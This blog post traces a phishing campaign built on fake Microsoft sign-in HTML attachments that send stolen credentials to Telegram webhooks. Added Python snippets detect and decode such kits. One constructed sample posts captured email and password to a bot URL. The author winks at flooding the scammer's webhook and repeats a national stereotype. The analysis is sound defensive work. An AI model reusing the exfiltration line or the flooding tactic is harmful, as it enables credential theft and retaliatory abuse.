Unlike many aspiring cybersec people, I am blessed to have the gift of a friend who hosts their own email server. Why is this important for researchers?
A while back I was generating JS payloads and sending them to myself over Gmail (I know, terrible opsec!), and before you ask - yes, it could be classified as a "malware stager", but it was for a CTF and did nothing malicious. Unfortunately for me, I found that I could not send myself the semi-malicious code which I had just cooked up, because Google gave me a lovely notification stating that my message was rejected due to security issues. I even zipped the file and STILL Google dug through it! I learned two things that day.
Google scans ALL your email attachments - including compressed archives. Wow, big surprise (not).
Google's malware attachment scan is extreme. I had just coded the JS payload and somehow Google knew it was malware.
The key takeaway is that Google's email filtering system is powerful. Every day hundreds of malicious and spam emails are sent from one server to another and yet we tend to not see any malicious MS word documents unless we are the target of a specific operation. This is also true for other email services like Outlook and Yahoo. So what happens when you don't have Google spyware scanning and malware detection filters on your inbox - as in you self host it?
You get malware sent to you. A lot of it.
The Gigachad, who I won't name, will on occasion forward me these malware-containing emails for me to process. From here on I will simply refer to my friend as "Gigachad". This is the story of one of those campaigns.
On September 13th 2023 I was greeted by my inbox telling me that Gigachad had sent me a new email! A campaign was waiting to be investigated! Attached was a single HTML file with the name "VM 1598948 faxing3773.html" and a size of 5.3 MB. So, I spun up my virtual machine, turned on my VPN, and made a file server on my host-only adapter. Upon opening the file I was greeted by 8 lines of HTML and one wall of JavaScript.
Hmmm. URL encoding. This is the part where I nearly lost it. You see, Qterminal doesn't have a select-all shortcut. I could open the HTML file in tee or cat or nano, but ANY time I opened it in a GUI text editor the software froze! LOOK AT THIS SHIT QT! I DON'T SEE THE OPTION FOR SELECT ALL!
Schizo rant aside, I eventually overcame this setback with the usage of VSCodium - a better version of Microsoft's Visual Studio Code without the added spyware. I copied everything and pasted it into my favorite URL decoder: Burp Suite. I pasted the code in, waited 5 minutes for the poor software to handle everything, and compared the results.
Huh. Another layer of URL encoding? I mean, that is one way of obfuscating code, I guess. I put the result into Burp Suite again, which resulted in the following output.
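Peeling nested URL-encoding layers by hand in Burp is slow on a 5 MB blob. The following is an added example (not code from the post) that URL-decodes a blob until it stops changing and reports how many layers came off; the sample payload is constructed here to mimic the double-encoded attachment, and the stop-at-HTML check is an assumption about what the innermost layer looks like.

```python
"""Peel nested URL-encoding layers from a captured HTML/JS blob.

Added example, not code from the original post. The sample payload is
constructed here to mimic the double-URL-encoded attachment described above.
"""
from urllib.parse import quote, unquote

MAX_LAYERS = 10  # guard against a blob that never reaches a fixed point


def peel_url_encoding(blob: str, max_layers: int = MAX_LAYERS):
    """Repeatedly URL-decode until the text stops changing.

    Returns (decoded_text, layers_removed). A layer only counts if decoding
    actually changed the text, so plain text reports 0 layers.
    """
    layers = 0
    current = blob
    while layers < max_layers:
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
        layers += 1
    return current, layers


def looks_like_html(text: str) -> bool:
    """Cheap check that we reached markup rather than yet another encoding."""
    head = text.lstrip()[:64].lower()
    return head.startswith(("<!doctype", "<html", "<script"))


# Constructed sample: a tiny page, URL-encoded twice like the attachment was.
ORIGINAL = '<!DOCTYPE html><html><script>var s="x@y.z";</script></html>'
SAMPLE = quote(quote(ORIGINAL, safe=""), safe="")

if __name__ == "__main__":
    text, layers = peel_url_encoding(SAMPLE)
    print(f"removed {layers} layer(s); html={looks_like_html(text)}")
    print(text)
```

Running it on the real file is just a matter of reading the attachment into `blob`; the layer count is worth keeping in your notes, since a change in the number of layers between samples is a cheap way to tell kit versions apart.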
NOW we are getting somewhere. If you have worked at all with JS malware you should recognize that this obfuscated code looks like it came straight out of obfuscator.io. Nothing a bit of debugging cannot reverse engineer. Unfortunately for me, I don't like waiting, and I don't want to decode all that Base64, so I jumped straight into dynamic analysis. We initially open up the HTML file to be greeted by a Microsoft SharePoint logo and a loading circle. After this we are then greeted with the Microsoft sign-in which we all know and love. Very impressive, especially considering so few external network requests have been made.
The HTML file even checks to see if the email is "valid", that is, that there is an at symbol sandwiched between two letters. Putting in a password that is less than 5 characters results in a pretty convincing "server error". Anyways, I put in the bogus information and hit send. Lo and behold, a request is intercepted!
Ah, it is the classic webhook exfiltrator. This time it seems that scammers have switched from using Discord webhooks to using Telegram webhooks. Unfortunately for our scammer, however, it seems that they shipped us a release candidate of their HTML file: the postal code, county, IP, org and everything else seem to be empty! As well as this, they left their ICQ handle! EPIC fail! Well, we now have a name for the scammer; let's call them Lio.
Gigachad looked into this and apparently found a LinkedIn page from the ICQ handle. Surprisingly, Lio is Nigerian, which just adds to the stereotype of Nigerian scammers. Regardless of whether or not this is a false flag, you should know what to do once you find a webhook for exfiltrating stolen data ;). I did not proceed to open up 5 repeater tabs and set my proxies to rotate, and I also did not send Lio a couple hundred copies of the bee movie script. And with that, another phishing campaign was thwarted. Case closed. Or so I thought...
On September the 15th I received a new email from Gigachad. Nothing out of the ordinary, just a new HTML file disguised as a .bin file with the name "Invoice#1012_.html.bin". Oldest trick in the book - the old "notavirus.jpg.exe". I never knew that scammers still try to use this trick. I opened the file.
Hey, wait a minute, I think I have seen this before! I decoded the URL-encoded garbage and out came version two of our Microsoft SharePoint HTML file. On the left is the original, on the right is V2. It seems that they execute a script to immediately write the HTML instead of having the <!DOCTYPE html> on the first line, and removed that stupid S they forgot to delete next to the head tags. One theory I have as to the reason for the change is to evade file type detection. If you rename "image.jpg" to "image" the OS usually still knows it is a jpg; maybe that is what the scammer was trying to do? Apart from the modifications at the start of the file, everything remained the same.
So I did not restart the intruder, I did not set my proxy rotator to run overnight, and I also did not send more copies of the bee movie script, but I did conclude that Lio would never bother me again.
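The two tricks above (the ".html.bin" double extension and moving the markup behind a document.write() so the file no longer starts with a DOCTYPE) both defeat a filter that trusts the filename or only looks at offset 0. The following is an added example, not code from the post or any mail gateway, of triaging an attachment by its bytes instead; the extension lists and the 4 KB sniffing window are my own assumptions, and the two samples are constructed to resemble V1 and V2 rather than being the real files.

```python
"""Triage an email attachment by content rather than by filename.

Added example, not code from the post. Flags the two evasions described
above: a double extension such as "Invoice#1012_.html.bin", and HTML/JS
whose first bytes were shuffled so a "starts with <!DOCTYPE html>" check
no longer fires. Extension sets and the sniff window are assumptions.
"""

HTML_MARKERS = (b"<!doctype html", b"<html", b"<head", b"<script", b"document.write(")
SCRIPT_OR_MARKUP_EXT = {"html", "htm", "js", "hta", "svg"}
NON_SCRIPT_EXT = {"bin", "pdf", "jpg", "jpeg", "png", "txt", "doc", "docx"}


def split_extensions(filename: str):
    """'Invoice#1012_.html.bin' -> ['html', 'bin'] (basename dropped, lowercased)."""
    parts = filename.lower().rsplit("/", 1)[-1].split(".")
    return parts[1:]


def has_double_extension(filename: str) -> bool:
    """True when an inner extension is scriptable and the outer one is not."""
    exts = split_extensions(filename)
    return len(exts) >= 2 and exts[-2] in SCRIPT_OR_MARKUP_EXT and exts[-1] in NON_SCRIPT_EXT


def sniff_html(data: bytes, window: int = 4096) -> bool:
    """Look for markup anywhere in the first `window` bytes, not only at offset 0."""
    head = data[:window].lower()
    return any(marker in head for marker in HTML_MARKERS)


def triage_attachment(filename: str, data: bytes) -> dict:
    exts = split_extensions(filename)
    outer = exts[-1] if exts else ""
    html = sniff_html(data)
    return {
        "double_extension": has_double_extension(filename),
        "html_content": html,
        # the outer extension claims a non-script type but the bytes are markup
        "extension_mismatch": html and outer in NON_SCRIPT_EXT,
    }


# Constructed samples resembling V1 (DOCTYPE first, stray "S") and V2 (script-written).
V1 = b"<!DOCTYPE html>\nS<head></head><body>...</body>"
V2 = b"<script>document.write('<html><head></head><body>...</body></html>')</script>"

if __name__ == "__main__":
    print(triage_attachment("VM 1598948 faxing3773.html", V1))
    print(triage_attachment("Invoice#1012_.html.bin", V2))
```

Any of the three flags is reason enough to detonate the file in a VM rather than a mail client; the mismatch flag in particular is what a rename to ".bin" is trying to hide.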
I was wrong.
On September 18th 2023 Gigachad sent me another email. I looked at the name and I already knew what to expect.
HUH? What is this??? Completely new code and only 17 KB in size! I immediately open it. The proxy immediately flashes, notifying me of an outbound GET request to fleek.ipfs.io. Further inspection shows that ipinfo.io. Inspecting the request, we see that there is a sizeable JS payload. This code is looking more like something a professional scammer built, not some skiddy! I guess Lio learned what ChatGPT was. After the rest of the JS code is put through, the HTML file then makes some requests to Microsoft CDNs to get their official image resources.
Now take a look at line 43. Looks like Lio wants to see who is definitely not spamming his Telegram channel. I of course happily give his little HTML file the correct information, as shown below.
And after typing in AAAAA as my password, a new Telegram webhook is revealed!
Once again, I did not open 6 tabs of Burp Intruder, I did not turn on my proxy rotator, I did not send ten thousand copies of the bee movie to Lio's channel, and I also did not change my location to the dark side of the moon.
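Both the first kit and this V3 kit exfiltrate the captured credentials by calling a Telegram bot webhook straight from the victim's browser. Rather than waiting to catch the request in a proxy, a defender can pull those endpoints out of the decoded script statically. The following is an added example, not code from the post: it matches the public URL shapes of the Telegram bot API and Discord webhooks (the only two services the post names), masks the token so the finding can go into a ticket, and turns the hosts into an egress block/alert list. The sample script and bot token are constructed, not taken from the real kit.

```python
"""Spot webhook-based credential exfiltration in a decoded phishing page.

Added example, not code from the post. The URL patterns are the public API
formats for Telegram bots and Discord webhooks; the sample kit and its bot
token below are constructed for the example.
"""
import re

# Public API URL shapes. The secret part is captured only so it can be masked in reports.
PATTERNS = {
    "telegram_bot_api": re.compile(r"https://api\.telegram\.org/bot(\d+:[A-Za-z0-9_-]+)/(\w+)"),
    "discord_webhook": re.compile(r"https://(?:discord|discordapp)\.com/api/webhooks/(\d+)/([A-Za-z0-9_-]+)"),
}


def mask(secret: str, keep: int = 4) -> str:
    """Keep a short prefix so analysts can correlate findings without copying the token."""
    return secret[:keep] + "..." if len(secret) > keep else "..."


def find_exfil_endpoints(script_text: str):
    """Return one finding per webhook call found in the decoded script."""
    findings = []
    for kind, pattern in PATTERNS.items():
        for m in pattern.finditer(script_text):
            findings.append({
                "kind": kind,
                "masked_id": mask(m.group(1)),
                "method": m.group(2),  # e.g. sendMessage, or the Discord webhook token
                "host": re.match(r"https://([^/]+)", m.group(0)).group(1),
            })
    return findings


def egress_blocklist(findings):
    """Hosts to block or alert on at the proxy for a fleet that has no business calling bot APIs."""
    return {f["host"] for f in findings}


# Constructed sample in the style of the kit: reads the two login fields and posts them to a bot.
SAMPLE_KIT = """
var e = document.getElementById('i0116').value, p = document.getElementById('i0118').value;
fetch('https://api.telegram.org/bot1234567890:FAKE_TOKEN_FOR_EXAMPLE_ONLY/sendMessage?chat_id=-100999&text=' + encodeURIComponent(e + ':' + p));
"""

if __name__ == "__main__":
    hits = find_exfil_endpoints(SAMPLE_KIT)
    for h in hits:
        print(h)
    print("block/alert at egress:", egress_blocklist(hits))
```

The same regexes work as a mail-gateway or proxy rule on the decoded body, which catches the kit before anyone types a password into it.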
I had once again beaten Lio, but deep down I knew that eventually he would stop using telegram...
Over the next two weeks Lio reverted to version 2.0. Who knows why this is; an ipfs.io TOS violation, perhaps? I wonder who reported that? Regardless, the only change in these trivial versions was the ICQ contact name. I continued to not run my intruder tabs.
And then it happened: V4.0 got released.
On September 25th 2023 I received an email from Gigachad. The file attachment was named Invoice#1012_.html.bin - 442 bytes in size. Lio was back from vacation, and by the looks of it he went to Meowmix Central and picked up some skitty tips. Inside the file were 10 lines of code. Base64-encoded.
Unfortunately my dumbass did not catalogue the images at this point, so I will have to describe in text what happened next. I opened the file. Immediately I was redirected to REDACTED.bpyquso.ru. The dreaded banner of Cloudflare appeared in view; looks like I won't be using Intruder this time. Now let me tell you a story about why I am not a big fan of Cloudflare.
A while back I had tracked a C&C server to a host behind Cloudflare. After sending evidence and proof that the host violated the TOS and explicitly delivered malware, Cloudflare manually rejected my request. Cloudflare has been known to host pirated content and extremist content behind its CDN and DDoS prevention network. This is just one of many instances of abuse that Cloudflare facilitates on the internet.
Regardless, inspecting the website revealed that Lio was using PHP. Typing in a bogus email no longer worked, as the website made a POST request to Lio's new API. I typed in a commonly used Microsoft account email, example@example.com, which then let me through. Typing in the password finished the job, with the username and password being sent to Lio's API. Unfortunately there was nothing I could really do about Lio this time.
Until I looked at the WHOIS. Lio's registrar info was exposed! Naturally, the registrar was located in Russia. Now, despite what you may think about the Russian internet, they are still MUCH better than Cloudflare at handling abuse complaints, and it never hurts to use Yandex Translate to send an abuse complaint. So, I sent a complaint, and now Lio's PHP website no longer functions. Could it have something to do with the lack of a registrar? Who knows. As of writing this blog, the WHOIS lookup now says that the registrar is Cloudflare (unsurprisingly). Still, it has been well over two weeks since Gigachad sent me an email from Lio; I think he has learned his lesson and has moved on to crypto-scamming.
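A 442-byte attachment that is nothing but Base64 is the easiest kind to triage: decode it and pull out where the page sends the victim. The following is an added example, not code from the post, that does exactly that and defangs the destination so it can be pasted into an abuse report; the Base64-wrapped sample is constructed (the real redirect target is not reproduced, and "example.invalid" is a reserved placeholder), and the set of redirect idioms it looks for is my own assumption about what a 10-line redirector uses.

```python
"""Decode a small Base64-only HTML attachment and pull out its redirect target.

Added example, not code from the post. The sample below is constructed: a few
lines of Base64 wrapping a script that sets window.location, in the style of
the 442-byte V4 attachment. The destination host is a reserved placeholder.
"""
import base64
import binascii
import re
from typing import List, Optional

# Redirect idioms a tiny redirector page commonly uses (assumption, not from the post).
REDIRECT_PATTERNS = [
    re.compile(r"""(?:window\.)?location(?:\.href)?\s*=\s*['"]([^'"]+)['"]"""),
    re.compile(r"""location\.replace\(\s*['"]([^'"]+)['"]"""),
    re.compile(r"""<meta[^>]+http-equiv=['"]?refresh['"]?[^>]*url=([^'">\s]+)""", re.I),
]


def decode_base64_attachment(data: bytes) -> Optional[bytes]:
    """Strip line breaks and decode strictly; None if the bytes are not valid Base64."""
    try:
        return base64.b64decode(b"".join(data.split()), validate=True)
    except (binascii.Error, ValueError):
        return None


def extract_redirects(html: bytes) -> List[str]:
    text = html.decode("utf-8", errors="replace")
    found = []
    for pat in REDIRECT_PATTERNS:
        found.extend(pat.findall(text))
    return found


def defang(url: str) -> str:
    """hxxp and [.] so the indicator is not clickable when pasted into a ticket."""
    return url.replace("http", "hxxp").replace(".", "[.]")


def triage_base64_html(data: bytes) -> dict:
    decoded = decode_base64_attachment(data)
    if decoded is None:
        return {"base64": False, "redirects": []}
    return {"base64": True, "redirects": [defang(u) for u in extract_redirects(decoded)]}


# Constructed sample: inner page redirects to a placeholder host, wrapped at 60 chars per line.
INNER = b"<html><script>window.location = 'https://login.example.invalid/?e=';</script></html>"
_ENC = base64.b64encode(INNER)
SAMPLE = b"\n".join(_ENC[i:i + 60] for i in range(0, len(_ENC), 60))

if __name__ == "__main__":
    print(triage_base64_html(SAMPLE))
```

The defanged URL is what goes into the abuse complaint to the registrar or host; the decoded bytes themselves are worth keeping, since a redirector this small usually changes only its destination between versions.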
The moral of this story my skittens is that "What kills you only makes you stronger" only works until it actually kills you. Thanks for reading.